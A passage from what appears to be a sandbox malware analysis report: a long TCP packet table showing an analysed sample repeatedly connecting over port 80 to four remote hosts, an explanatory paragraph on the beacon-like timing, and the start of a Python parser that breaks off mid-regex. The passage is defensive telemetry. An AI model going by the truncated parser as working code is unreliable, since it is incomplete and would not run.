                                                    Sep 5, 2024 14:26:11.568639040 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:11.568733931 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:11.571048975 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:11.575934887 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167295933 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167320967 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167332888 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167351007 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167363882 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167373896 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167386055 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167398930 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167412043 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167423010 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.167469978 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:12.167515993 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:12.172365904 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.172432899 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.172626019 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:12.191920042 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.191965103 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.192074060 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:12.255501986 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.255536079 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.255548954 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.255664110 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:12.255669117 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.255778074 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:12.255861044 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:12.260469913 CEST5721180192.168.2.513.248.151.237
                                                    Sep 5, 2024 14:26:12.265403032 CEST805721113.248.151.237192.168.2.5
                                                    Sep 5, 2024 14:26:17.476039886 CEST5721280192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:17.483588934 CEST805721234.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:17.484204054 CEST5721280192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:17.488027096 CEST5721280192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:17.493210077 CEST805721234.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:17.948947906 CEST805721234.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:17.949378014 CEST805721234.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:17.952178955 CEST5721280192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:18.998403072 CEST5721280192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:20.020031929 CEST5721380192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:20.025007010 CEST805721334.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:20.025182009 CEST5721380192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:20.028033972 CEST5721380192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:20.032854080 CEST805721334.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:20.494457006 CEST805721334.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:20.494714975 CEST805721334.149.87.45192.168.2.5
                                                    Sep 5, 2024 14:26:20.494765997 CEST5721380192.168.2.534.149.87.45
                                                    Sep 5, 2024 14:26:21.536040068 CEST5721380192.168.2.534.149.87.45
Sep 5, 2024 14:26:22.548791885 CEST        57214         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:22.553874969 CEST           80      57214  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:22.553960085 CEST        57214         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:22.556262970 CEST        57214         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:22.561153889 CEST           80      57214  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:22.561194897 CEST           80      57214  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:23.015678883 CEST           80      57214  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:23.015829086 CEST           80      57214  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:23.015896082 CEST        57214         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:24.060520887 CEST        57214         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:25.079320908 CEST        57215         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:25.084233999 CEST           80      57215  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:25.084317923 CEST        57215         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:25.086555004 CEST        57215         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:25.091351986 CEST           80      57215  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:25.546081066 CEST           80      57215  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:25.546149969 CEST           80      57215  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:25.546426058 CEST        57215         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:25.549161911 CEST        57215         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:25.553946018 CEST           80      57215  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:30.598366976 CEST        57216         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:30.603332996 CEST           80      57216  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:30.603423119 CEST        57216         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:30.605568886 CEST        57216         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:30.610363007 CEST           80      57216  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:31.226120949 CEST           80      57216  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:31.226140976 CEST           80      57216  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:31.226239920 CEST        57216         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:32.107470989 CEST        57216         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:33.127619028 CEST        57217         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:33.245816946 CEST           80      57217  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:33.245919943 CEST        57217         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:33.248716116 CEST        57217         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:33.253846884 CEST           80      57217  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:33.887597084 CEST           80      57217  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:33.887630939 CEST           80      57217  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:33.887795925 CEST        57217         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:34.763703108 CEST        57217         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:35.782764912 CEST        57218         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:35.792926073 CEST           80      57218  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:35.793060064 CEST        57218         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:35.796065092 CEST        57218         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:35.801064968 CEST           80      57218  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:35.801081896 CEST           80      57218  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:36.447278976 CEST           80      57218  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:36.447705984 CEST           80      57218  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:36.447900057 CEST        57218         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:37.310622931 CEST        57218         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:38.329026937 CEST        57219         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:38.334008932 CEST           80      57219  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:38.336179018 CEST        57219         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:38.340058088 CEST        57219         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:38.344871044 CEST           80      57219  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:38.962238073 CEST           80      57219  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:38.962441921 CEST           80      57219  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:38.962806940 CEST        57219         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:38.966345072 CEST        57219         80  192.168.2.5      91.203.110.247
Sep 5, 2024 14:26:38.972265005 CEST           80      57219  91.203.110.247   192.168.2.5
Sep 5, 2024 14:26:44.020456076 CEST        57220         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:44.025371075 CEST           80      57220  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:44.027249098 CEST        57220         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:44.030093908 CEST        57220         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:44.035052061 CEST           80      57220  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:44.499119997 CEST           80      57220  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:44.499269009 CEST           80      57220  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:44.499385118 CEST        57220         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:45.544904947 CEST        57220         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:46.566993952 CEST        57221         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:46.571995974 CEST           80      57221  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:46.572072983 CEST        57221         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:46.574439049 CEST        57221         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:46.579813957 CEST           80      57221  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:47.030900955 CEST           80      57221  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:47.030925989 CEST           80      57221  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:47.030980110 CEST        57221         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:48.080097914 CEST        57221         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:49.211859941 CEST        57222         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:49.216792107 CEST           80      57222  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:49.216865063 CEST        57222         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:49.224646091 CEST        57222         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:49.229470968 CEST           80      57222  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:49.229605913 CEST           80      57222  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:49.679217100 CEST           80      57222  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:49.679353952 CEST           80      57222  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:49.688095093 CEST        57222         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:50.732439995 CEST        57222         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:51.751734018 CEST        57223         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:51.816386938 CEST           80      57223  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:51.818233967 CEST        57223         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:51.824080944 CEST        57223         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:51.830195904 CEST           80      57223  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:52.280508995 CEST           80      57223  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:52.280592918 CEST           80      57223  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:52.280814886 CEST        57223         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:52.283416033 CEST        57223         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:52.512567997 CEST           80      57223  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:52.512625933 CEST        57223         80  192.168.2.5      34.149.87.45
Sep 5, 2024 14:26:52.517926931 CEST           80      57223  34.149.87.45     192.168.2.5
Sep 5, 2024 14:26:57.431036949 CEST        57224         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:57.435894012 CEST           80      57224  72.52.178.23     192.168.2.5
Sep 5, 2024 14:26:57.435970068 CEST        57224         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:57.438364983 CEST        57224         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:57.443365097 CEST           80      57224  72.52.178.23     192.168.2.5
Sep 5, 2024 14:26:57.961407900 CEST           80      57224  72.52.178.23     192.168.2.5
Sep 5, 2024 14:26:57.961604118 CEST        57224         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:58.951184988 CEST        57224         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:58.956147909 CEST           80      57224  72.52.178.23     192.168.2.5
Sep 5, 2024 14:26:59.972088099 CEST        57225         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:59.977072001 CEST           80      57225  72.52.178.23     192.168.2.5
Sep 5, 2024 14:26:59.977663040 CEST        57225         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:59.980089903 CEST        57225         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:26:59.985054970 CEST           80      57225  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:00.474349022 CEST           80      57225  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:00.476531982 CEST        57225         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:01.482439041 CEST        57225         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:01.558721066 CEST           80      57225  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:02.501485109 CEST        57226         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:02.507879972 CEST           80      57226  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:02.510265112 CEST        57226         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:02.516108990 CEST        57226         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:02.521004915 CEST           80      57226  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:02.521214962 CEST           80      57226  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:03.017194986 CEST           80      57226  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:03.017249107 CEST        57226         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:04.013695002 CEST        57226         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:04.018662930 CEST           80      57226  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:05.032582998 CEST        57227         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:05.037960052 CEST           80      57227  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:05.038031101 CEST        57227         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:05.040975094 CEST        57227         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:05.045933008 CEST           80      57227  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:05.588308096 CEST           80      57227  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:05.588336945 CEST           80      57227  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:05.588485956 CEST        57227         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:05.591108084 CEST        57227         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:05.595901966 CEST           80      57227  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:11.124428034 CEST        57228         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:11.129270077 CEST           80      57228  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:11.129352093 CEST        57228         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:11.136218071 CEST        57228         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:11.141032934 CEST           80      57228  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:11.584598064 CEST           80      57228  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:11.584621906 CEST           80      57228  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:11.584758997 CEST           80      57228  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:11.584928036 CEST        57228         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:12.638700008 CEST        57228         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:13.657598019 CEST        57229         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:13.708678007 CEST           80      57229  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:13.711282015 CEST        57229         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:13.714132071 CEST        57229         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:13.720426083 CEST           80      57229  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:14.188874960 CEST           80      57229  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:14.189316034 CEST           80      57229  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:14.189327955 CEST           80      57229  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:14.189518929 CEST        57229         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:15.220062017 CEST        57229         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:16.235399008 CEST        57230         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:16.682725906 CEST           80      57230  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:16.682807922 CEST        57230         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:16.684978962 CEST        57230         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:16.692006111 CEST           80      57230  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:16.694051027 CEST           80      57230  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:17.145067930 CEST           80      57230  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:17.145093918 CEST           80      57230  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:17.145111084 CEST           80      57230  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:17.145172119 CEST        57230         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:18.204114914 CEST        57230         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:19.220578909 CEST        57231         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:19.225928068 CEST           80      57231  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:19.226015091 CEST        57231         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:19.228796959 CEST        57231         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:19.233686924 CEST           80      57231  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:19.681514978 CEST           80      57231  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:19.681539059 CEST           80      57231  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:19.681552887 CEST           80      57231  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:19.681884050 CEST        57231         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:19.684678078 CEST        57231         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:19.691042900 CEST           80      57231  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:33.067064047 CEST        57232         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:33.071986914 CEST           80      57232  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:33.072057009 CEST        57232         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:33.075530052 CEST        57232         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:33.080703974 CEST           80      57232  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:33.552771091 CEST           80      57232  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:33.552799940 CEST           80      57232  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:33.552885056 CEST        57232         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:33.553610086 CEST           80      57232  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:33.553663969 CEST        57232         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:34.594352007 CEST        57232         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:35.614454985 CEST        57233         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:35.619570017 CEST           80      57233  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:35.625698090 CEST        57233         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:35.625698090 CEST        57233         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:35.630744934 CEST           80      57233  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:36.110003948 CEST           80      57233  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:36.110493898 CEST           80      57233  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:36.110507965 CEST           80      57233  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:36.110584974 CEST        57233         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:37.138794899 CEST        57233         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:38.158381939 CEST        57234         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:38.165132046 CEST           80      57234  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:38.168230057 CEST        57234         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:38.170308113 CEST        57234         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:38.175363064 CEST           80      57234  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:38.175405025 CEST           80      57234  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:38.652837992 CEST           80      57234  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:38.652857065 CEST           80      57234  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:38.652931929 CEST        57234         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:38.653163910 CEST           80      57234  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:38.653209925 CEST        57234         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:39.685592890 CEST        57234         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:40.705756903 CEST        57235         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:40.710612059 CEST           80      57235  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:40.710724115 CEST        57235         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:40.715140104 CEST        57235         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:40.719949007 CEST           80      57235  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:41.175417900 CEST           80      57235  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:41.175461054 CEST           80      57235  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:41.175534010 CEST           80      57235  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:41.175589085 CEST        57235         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:41.175628901 CEST        57235         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:41.178894043 CEST        57235         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:41.184009075 CEST           80      57235  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:49.237508059 CEST        57236         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:49.242480040 CEST           80      57236  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:49.242547035 CEST        57236         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:49.244653940 CEST        57236         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:49.249546051 CEST           80      57236  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:49.708673954 CEST           80      57236  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:49.709034920 CEST           80      57236  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:49.709047079 CEST           80      57236  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:49.709341049 CEST        57236         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:49.711714029 CEST        57236         80  192.168.2.5      199.59.243.226
Sep 5, 2024 14:27:49.716584921 CEST           80      57236  199.59.243.226   192.168.2.5
Sep 5, 2024 14:27:54.721198082 CEST        57237         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:54.726146936 CEST           80      57237  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:54.726232052 CEST        57237         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:54.728523970 CEST        57237         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:54.733391047 CEST           80      57237  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:55.252393961 CEST           80      57237  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:55.252464056 CEST        57237         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:56.232461929 CEST        57237         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:56.237510920 CEST           80      57237  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:57.251401901 CEST        57238         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:57.258594990 CEST           80      57238  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:57.258694887 CEST        57238         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:57.260699987 CEST        57238         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:57.265683889 CEST           80      57238  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:57.753067017 CEST           80      57238  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:57.753495932 CEST        57238         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:58.763679028 CEST        57238         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:58.768713951 CEST           80      57238  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:59.783195972 CEST        57239         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:59.788218021 CEST           80      57239  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:59.794142008 CEST        57239         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:59.794142008 CEST        57239         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:27:59.799346924 CEST           80      57239  72.52.178.23     192.168.2.5
Sep 5, 2024 14:27:59.799479008 CEST           80      57239  72.52.178.23     192.168.2.5
Sep 5, 2024 14:28:00.299591064 CEST           80      57239  72.52.178.23     192.168.2.5
Sep 5, 2024 14:28:00.299707890 CEST        57239         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:28:01.311580896 CEST        57239         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:28:01.316559076 CEST           80      57239  72.52.178.23     192.168.2.5
Sep 5, 2024 14:28:02.330225945 CEST        57240         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:28:02.335171938 CEST           80      57240  72.52.178.23     192.168.2.5
Sep 5, 2024 14:28:02.338592052 CEST        57240         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:28:02.342185974 CEST        57240         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:28:02.349392891 CEST           80      57240  72.52.178.23     192.168.2.5
Sep 5, 2024 14:28:02.887254953 CEST           80      57240  72.52.178.23     192.168.2.5
Sep 5, 2024 14:28:02.888048887 CEST           80      57240  72.52.178.23     192.168.2.5
Sep 5, 2024 14:28:02.888098001 CEST        57240         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:28:02.894931078 CEST        57240         80  192.168.2.5      72.52.178.23
Sep 5, 2024 14:28:02.899789095 CEST           80      57240  72.52.178.23     192.168.2.5
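The TCP rows above show the sample cycling through four port-80 hosts (34.149.87.45, 91.203.110.247, 72.52.178.23, 199.59.243.226): a new connection, identifiable by a fresh ephemeral source port, about every 2.5 s, typically four per host, with a DNS lookup to 1.1.1.1 roughly every 13 s before the sample moves to the next host (see the UDP table below). The rows were extracted with their columns run together, so the first step in working with them is to split the fused fields back apart. The following Python is an added example written for this page, not Joe Sandbox code: it parses the fused rows and reports the connection count and median inter-connection gap per remote host. It takes the analysis host address 192.168.2.5 from the table itself; the use of the Windows dynamic port range (49152-65535) to disambiguate the fused port digits is an assumption of the example, and the sample rows are copied verbatim from this report's TCP and UDP tables.

```python
# Added example (not Joe Sandbox code): parse the fused packet rows above and
# measure how often the sample opens a new connection to each remote host.
import re
import statistics
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

LOCAL_IP = "192.168.2.5"          # analysis host, present in every row of the tables
EPHEMERAL = range(49152, 65536)   # Windows dynamic (client) port range; heuristic assumed here
ROW_RE = re.compile(r"^(?P<date>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})"
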